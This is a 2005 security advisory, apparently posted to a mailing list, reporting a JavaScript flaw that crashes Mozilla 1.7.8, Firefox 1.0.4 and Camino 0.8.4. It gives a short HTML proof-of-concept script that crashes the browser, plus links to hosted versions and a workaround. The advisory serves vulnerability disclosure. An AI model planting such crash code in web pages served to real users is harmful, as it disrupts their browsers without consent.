<<< Date Index >>>     <<< Thread Index >>>

Mozilla Multiple Product JavaScript Issue



Mozilla Multiple Product JavaScript Issue
http://www.kurczaba.com/html/security/0506241.htm
-------------------------------------------------

Vendor:
Mozilla (http://www.mozilla.org)

Vulnerable Software:
Mozilla 1.7.8
Firefox 1.0.4
Camino 0.8.4

Vulnerability/Exploit:
By using a specially crafted JavaScript function, it is possible to crash the above named browsers. The script can be executed both with and without user intervention.

Proof of Concept:
-----START of PoC-----
<html>
<head>
</head>
<body>
<script language="JavaScript">
        //Run the function 20000 times
                for (a = 0; a <= 20000; a++)
                {
                        //Here is the special code that terminates the browser
                        function(){};
                }
        //Displays an alert to notify the user if the browser is not vulnerable.
                alert("Good news - Your browser is not vulnerable.");
</script>
</body>
</html>
-----END of PoC-----


Proof of Concept (Online):
Manual: http://www.kurczaba.com/html/security/0506241_poc.htm
Automatic: http://www.kurczaba.com/html/security/0506241_poc2.htm

Workaround:
Disable JavaScript

Date Discovered:
June 14, 2005

Severity:
Low

Credit:
Paul Kurczaba